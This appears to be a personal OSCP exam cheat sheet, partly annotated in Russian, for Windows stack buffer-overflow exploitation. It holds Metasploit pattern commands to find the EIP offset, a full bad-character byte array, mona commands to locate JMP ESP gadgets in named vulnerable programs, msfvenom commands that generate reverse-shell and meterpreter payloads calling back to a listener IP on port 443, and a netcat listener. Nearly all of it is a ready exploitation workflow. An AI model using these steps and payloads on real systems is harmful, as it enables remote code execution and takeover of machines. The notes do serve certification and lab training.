https://projects.jason-rush.com/tools/buffer-overflow-eip-offset-string-generator/
rdesktop -u 'administrator' -p 'lab' 192.168.235.10 -r disk:linux=/home/kali/OSCP/EXAM/
msf-pattern_create -l 2400
or #/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
msf-pattern_offset -l 2400 -q 39794338
or #/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438
!!!ВАЖНО искать циферные блоки справа налево, если есть несоответствие к примеру 0F0504030201 и на этом прерывание дальше добавляем бедчар в исключение при генерации пейлоуда вместе со стандартными \x00\x0d\x0a
#BadChars
badchars = (
"\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d\\\\x0e\\\\x0f\\\\x10"
"\\\\x11\\\\x12\\\\x13\\\\x14\\\\x15\\\\x16\\\\x17\\\\x18\\\\x19\\\\x1a\\\\x1b\\\\x1c\\\\x1d\\\\x1e\\\\x1f\\\\x20"
"\\\\x21\\\\x22\\\\x23\\\\x24\\\\x25\\\\x26\\\\x27\\\\x28\\\\x29\\\\x2a\\\\x2b\\\\x2c\\\\x2d\\\\x2e\\\\x2f\\\\x30"
"\\\\x31\\\\x32\\\\x33\\\\x34\\\\x35\\\\x36\\\\x37\\\\x38\\\\x39\\\\x3a\\\\x3b\\\\x3c\\\\x3d\\\\x3e\\\\x3f\\\\x40"
"\\\\x41\\\\x42\\\\x43\\\\x44\\\\x45\\\\x46\\\\x47\\\\x48\\\\x49\\\\x4a\\\\x4b\\\\x4c\\\\x4d\\\\x4e\\\\x4f\\\\x50"
"\\\\x51\\\\x52\\\\x53\\\\x54\\\\x55\\\\x56\\\\x57\\\\x58\\\\x59\\\\x5a\\\\x5b\\\\x5c\\\\x5d\\\\x5e\\\\x5f\\\\x60"
"\\\\x61\\\\x62\\\\x63\\\\x64\\\\x65\\\\x66\\\\x67\\\\x68\\\\x69\\\\x6a\\\\x6b\\\\x6c\\\\x6d\\\\x6e\\\\x6f\\\\x70"
"\\\\x71\\\\x72\\\\x73\\\\x74\\\\x75\\\\x76\\\\x77\\\\x78\\\\x79\\\\x7a\\\\x7b\\\\x7c\\\\x7d\\\\x7e\\\\x7f\\\\x80"
"\\\\x81\\\\x82\\\\x83\\\\x84\\\\x85\\\\x86\\\\x87\\\\x88\\\\x89\\\\x8a\\\\x8b\\\\x8c\\\\x8d\\\\x8e\\\\x8f\\\\x90"
"\\\\x91\\\\x92\\\\x93\\\\x94\\\\x95\\\\x96\\\\x97\\\\x98\\\\x99\\\\x9a\\\\x9b\\\\x9c\\\\x9d\\\\x9e\\\\x9f\\\\xa0"
"\\\\xa1\\\\xa2\\\\xa3\\\\xa4\\\\xa5\\\\xa6\\\\xa7\\\\xa8\\\\xa9\\\\xaa\\\\xab\\\\xac\\\\xad\\\\xae\\\\xaf\\\\xb0"
"\\\\xb1\\\\xb2\\\\xb3\\\\xb4\\\\xb5\\\\xb6\\\\xb7\\\\xb8\\\\xb9\\\\xba\\\\xbb\\\\xbc\\\\xbd\\\\xbe\\\\xbf\\\\xc0"
"\\\\xc1\\\\xc2\\\\xc3\\\\xc4\\\\xc5\\\\xc6\\\\xc7\\\\xc8\\\\xc9\\\\xca\\\\xcb\\\\xcc\\\\xcd\\\\xce\\\\xcf\\\\xd0"
"\\\\xd1\\\\xd2\\\\xd3\\\\xd4\\\\xd5\\\\xd6\\\\xd7\\\\xd8\\\\xd9\\\\xda\\\\xdb\\\\xdc\\\\xdd\\\\xde\\\\xdf\\\\xe0"
"\\\\xe1\\\\xe2\\\\xe3\\\\xe4\\\\xe5\\\\xe6\\\\xe7\\\\xe8\\\\xe9\\\\xea\\\\xeb\\\\xec\\\\xed\\\\xee\\\\xef\\\\xf0"
"\\\\xf1\\\\xf2\\\\xf3\\\\xf4\\\\xf5\\\\xf6\\\\xf7\\\\xf8\\\\xf9\\\\xfa\\\\xfb\\\\xfc\\\\xfd\\\\xfe\\\\xff" )
Badchars \\\\x04\\\\x36\\\\x81\\\\x98\\\\xa7
!mona modules
!mona find -s "\\\\xff\\\\xe4" -m "VulnApp2.exe" esp
!mona find -s "\\\\xff\\\\xe1" -m "VulnApp2.exe" ecx
!mona jmp -r esp -m "storageserver.exe"
!mona jmp -r ESP
!mona bytearray -b '\\\\x00'
ROP Chain:
msf-nasm_shell #FFE4 jmp esp
OR
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -b "\\\\x00" #-f python
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.19.23 lport=443 -b "\\\\x00\\\\x0a\\\\x0d" #!Шикату не указывать
sudo rlwrap nc -nlvp 443
https://github.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practicehttp://strongcourage.github.io/2020/04/19/bof.htmlhttps://malikashish8.github.io/Walkthrough/notes/https://github.com/ret2eax/oscp-scripts/blob/master/Exploitation/Buffer Overflows/README.mdhttps://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html
#VulnServer https://github.com/stephenbradshaw/vulnserverhttps://www.youtube.com/watch?v=cOR_j33Ieq4